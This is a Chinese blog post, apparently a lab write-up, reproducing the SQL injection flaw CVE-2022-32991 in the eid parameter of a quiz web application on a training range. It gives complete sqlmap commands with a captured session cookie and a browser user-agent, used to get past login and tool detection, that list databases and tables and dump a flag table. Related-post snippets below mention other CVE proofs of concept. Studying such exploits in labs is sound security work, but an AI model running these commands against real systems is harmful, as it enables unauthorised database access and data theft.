CVE-2022-32991 漏洞复现

已于 2023-01-17 23:12:56 修改
阅读量1.1k 收藏 4
点赞数 1
文章标签: 安全 web安全
于 2023-01-17 14:37:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73734019/article/details/128714861
版权

目录

一些资料

工具

题解

 sqlmap

解1: 只用cookie和ua头

 解2:保存读取所有http header信息

每日emo

一些资料

NVD - CVE-2022-32991 (nist.gov)

在welcome.php页面存在sql注入,注入点参数为eid

工具

  • sqlmap
  • Burpsuite

题解

打开靶场,有登录和注册选项

注册一个账号并登录

 观察该url知道,是我们要找的welcome.php界面,但是参数不是我们想找的eid,继续寻找

 在点击第一个start之后

 找到了我们要的welcome.php和eid 

burp抓包看看

 sqlmap

参考:sqlmap使用教程(超详细)_Redmaple925的博客-CSDN博客_sqlmap使用教程 详细介绍了sqlmap用法

解1: 只用cookie和ua头

因为要绕过用户登录检测和对sqlmap攻击的检测,通过cookie和ua头来绕过

记录Sqlmap攻击所需的HTTP头部请求参数:

cookie:PHPSESSID=1iudqcpog1tnej5midsic2rjs4

user-agent :Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

sqlmap命令语句

sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch --dbs

命令解释:

-u    =>  指定要攻击的url

-p      指定注入点参数

--user-agent    指定ua头

--cookie        指定cookie

--batch           默认确认(y)

--dbs          爆破所有数据库(databases缩写)

 爆库:

 爆表:

sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch -D ctf --tables

 爆字段:

sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch -D ctf -T flag --columns

 读数据:

sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch -D ctf -T flag -C flag --dump

 

 解2:保存读取所有http header信息

*号标记注入点

 sqlmap:

sqlmap -r /home/kali/桌面/6.txt -batch --dbs
sqlmap -r /home/kali/桌面/6.txt -batch -D ctf --tables
sqlmap -r /home/kali/桌面/6.txt -batch -D ctf -T flag --columns
sqlmap -r /home/kali/桌面/6.txt -batch -D ctf -T flag -C flag --dump

操作和上面一样,不过方便许多

每日emo

温柔扑了个空才长记性。
相信我们的缘分就是从你双击屏幕开始的

J_0k3r
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web Based Quiz System SQL注入漏洞复现CVE-2022-32991
千寻的博客
11-25 1030
`Sourcecodester Web Based Quiz System`是 (`Sourcecodester`)开源的一个应用软件。用于一个简单的在线基础的项目。 `Web Based Quiz System v1.0`版本存在安全漏洞,该漏洞源于通过` welcome.php `中的`eid` 参数发现存在 SQL 注入漏洞。该CMS的welcome.php中存在SQL注入攻击。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-32991漏洞复现(春秋云镜手工注入sql+自己配置内网环境)
c0529的博客
12-15 167
Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。得到了flag,就可以交了,这些过程证明了该漏洞可以利用于查询该数据库的敏感信息,可以利用这些方式得到数据库中用户的账户密码等等。从onder by 1一直尝试到order by 6,只有6报错,发现该表有五个字段。查询数据库中的所有表的名字,利用数据库自带的表,得到了所有的表。用hackbar插件输入(火狐浏览器)看到了flag表,查询表内的列。
CVE-2022-32991
最新发布
sinat_25635183的博客
03-25 299
2、CVE-2022-32991Web Based Quiz System v1.0版本中存在的SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。但是提示sqlmap的版本过时了, "your sqlmap version is outdated",那么就意味着你当前使用的 sqlmap版本可能已经不是最新版本,建议你及时更新到最新版本以确保工具的效用和安全性。使用sqlmap工具(本人使用的是kali下的sqlmap)猜测数据库为:ctf。
云镜CVE-2022-32991复现
m0_46684679的博客
02-01 271
云镜CVE-2022-32991SQL注入漏洞复现
【春秋云境】CVE-2022-32991
ZXW_NUDT的博客
02-22 2498
【春秋云境】CVE-2022-32991
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 593
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
CVE-2022-32991漏洞复现
2301_78321656的博客
07-10 1197
3.登录成功后寻找注入点,根据靶场提示CMS的welcome.php中存在SQL注入。9.爆出字段名,加 --dump 对字段值进行爆破,找到flag。7.爆出四个库,选择ctf库,加--tables对表进行爆破。该CMS的welcome.php中存在SQL注入漏。8.爆出九个表,选择flag表,对字段进行爆破。4.在eid参数后面添加单引号测试,出现报错。6.使用sqlmap工具进行所有数据库爆破。1.打开靶场,并进行访问。2.任意注册帐户密码。
简单的Apache Airflow(CVE-2022-40127)漏洞复现
kali_Ma的博客
12-09 1422
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。官方已发布版本 2.4.3,可升级Apache Airflow版本到2.4.0或以上,或者停用默认 Dags。当攻击者可访问到Apache Airflow的后台,且环境中存在默认。
CVE-2022-33891 Apache spark shell 命令注入漏洞复现
蚁景网安学院
07-25 1250
Spark 是用于大规模数据处理的统一分析引擎。它提供了 Scala、Java、Python 和 R 中的高级 API,以及支持用于数据分析的通用计算图的优化引擎。它还支持一组丰富的高级工具,包括用于 SQL 和 DataFrames 的 Spark SQL、用于 Pandas 工作负载的 Spark 上的 Pandas API、用于机器学习的 MLlib、用于图形处理的 GraphX 和用于流处理的结构化流。.........
spring framework漏洞复现
m0_56135391的博客
04-12 1760
1.在vulfocus平台启动spring framework漏洞环境 2.使用安装有python3环境的机器对该靶场进行漏洞验证,此处使用kali进行攻击,命令为python3 poc文件 -- url 目标地址3.漏洞验证 poc(python文件) #coding:utf-8 import requests import argparse from urllib.parse import urljoin def Exploit(url): headers = {"suffix":"%
春秋云镜 CVE-2022-32991 Web Based Quiz System v1.0 [超详细新手教程]
starttv的博客
10-26 729
Web Based Quiz System v1.0 通过welcome.php 中的eid 参数被发现包含一个SQL 注入漏洞
cve-2022-41741漏洞复现
08-24
因此,要复现CVE-2022-41741漏洞,首先需要使用受影响的版本(例如nginx-1.23.1及之前的版本),然后使用ngx_http_mp4_module模块进行相关操作,即可复现漏洞。请注意,为了保障系统的安全性,我们强烈建议及时更新...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值